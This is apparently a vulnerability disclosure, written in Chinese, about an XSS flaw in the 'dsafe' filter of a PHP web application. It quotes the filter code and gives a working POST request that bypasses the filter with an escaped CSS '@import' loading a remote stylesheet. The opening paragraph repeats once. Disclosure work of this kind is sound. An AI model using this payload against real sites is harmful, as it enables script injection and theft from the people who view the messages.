VULHUB ™

### 简要描述： 只测试了ie6，弹了个框框。 ### 详细说明： ``` function dsafe($string) { if(is_array($string)) { return array_map('dsafe', $string); } else { $string = preg_replace("/\<\!\-\-([\s\S]*?)\-\-\>/", "", $string); $string = preg_replace("/\/\*([\s\S]*?)\*\//", "", $string); $string = preg_replace("/&#([a-z0-9]+)([;]*)/i", "", $string); if(preg_match("/&#([a-z0-9]+)([;]*)/i", $string)) return nl2br(strip_tags($string)); $match = array("/s[\s]*c[\s]*r[\s]*i[\s]*p[\s]*t/i","/d[\s]*a[\s]*t[\s]*a/i","/b[\s]*a[\s]*s[\s]*e/i","/e[\\\]*x[\\\]*p[\\\]*r[\\\]*e[\\\]*s[\\\]*s[\\\]*i[\\\]*o[\\\]*n/i","/on([a-z]{2,})([\(|\=|\s]+)/i","/about/i","/frame/i","/link/i","/import/i","/meta/i","/textarea/i","/eval/i","/alert/i","/confirm/i","/prompt/i","/cookie/i","/document/i","/newline/i","/colon/i","/\\\x/i"); $replace =...

### 简要描述： 只测试了ie6，弹了个框框。 ### 详细说明： ``` function dsafe($string) { if(is_array($string)) { return array_map('dsafe', $string); } else { $string = preg_replace("/\<\!\-\-([\s\S]*?)\-\-\>/", "", $string); $string = preg_replace("/\/\*([\s\S]*?)\*\//", "", $string); $string = preg_replace("/&#([a-z0-9]+)([;]*)/i", "", $string); if(preg_match("/&#([a-z0-9]+)([;]*)/i", $string)) return nl2br(strip_tags($string)); $match = array("/s[\s]*c[\s]*r[\s]*i[\s]*p[\s]*t/i","/d[\s]*a[\s]*t[\s]*a/i","/b[\s]*a[\s]*s[\s]*e/i","/e[\\\]*x[\\\]*p[\\\]*r[\\\]*e[\\\]*s[\\\]*s[\\\]*i[\\\]*o[\\\]*n/i","/on([a-z]{2,})([\(|\=|\s]+)/i","/about/i","/frame/i","/link/i","/import/i","/meta/i","/textarea/i","/eval/i","/alert/i","/confirm/i","/prompt/i","/cookie/i","/document/i","/newline/i","/colon/i","/\\\x/i"); $replace = array("s<em></em>cript","da<em></em>ta","ba<em></em>se","ex<em></em>pression","o<em></em>n\\1\\2","a<em></em>bout","f<em></em>rame","l<em></em>ink","im<em></em>port","me<em></em>ta","text<em></em>area","e<em></em>val","a<em></em>lert","/con<em></em>firm/i","prom<em></em>pt","coo<em></em>kie","docu<em></em>ment","new<em></em>line","co<em></em>lon","\<em></em>x"); return preg_replace($match, $replace, $string); } } ``` 翻译了一下。 "/script/","/data/i","/base/i","/e[\]*x[\]*p[\]*r[\]*e[\]*s[\]*s[\]*i[\]*o[\]*n/i","/on([a-z]{2,})([\(|\=|\s]+)/i","/about/i","/frame/i","/link/i","/import/i","/meta/i","/textarea/i","/eval/i","/alert/i","/confirm/i","/prompt/i","/cookie/i","/document/i","/newline/i","/colon/i","/\x/i" 然后发现了import没防\ ``` action=send&typeid=-1&message%5Btouser%5D=destoon&message%5Btitle%5D=test123&message%5Bcontent%5D=<STYLE>%40imp\ort'http%3a//ha.ckers.org/xss.css'%3b</STYLE> &message%5Bcopy%5D=1&submit=+%E7%A1%AE+%E5%AE%9A+ ``` ### 漏洞证明： [<img src="https://images.seebug.org/upload/201406/27172540544c8b40b2d03baeb8ab8ed6c7f8013a.png" alt="QQ截图20140627172542.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201406/27172540544c8b40b2d03baeb8ab8ed6c7f8013a.png) 看sheet上是ie6到8都有效。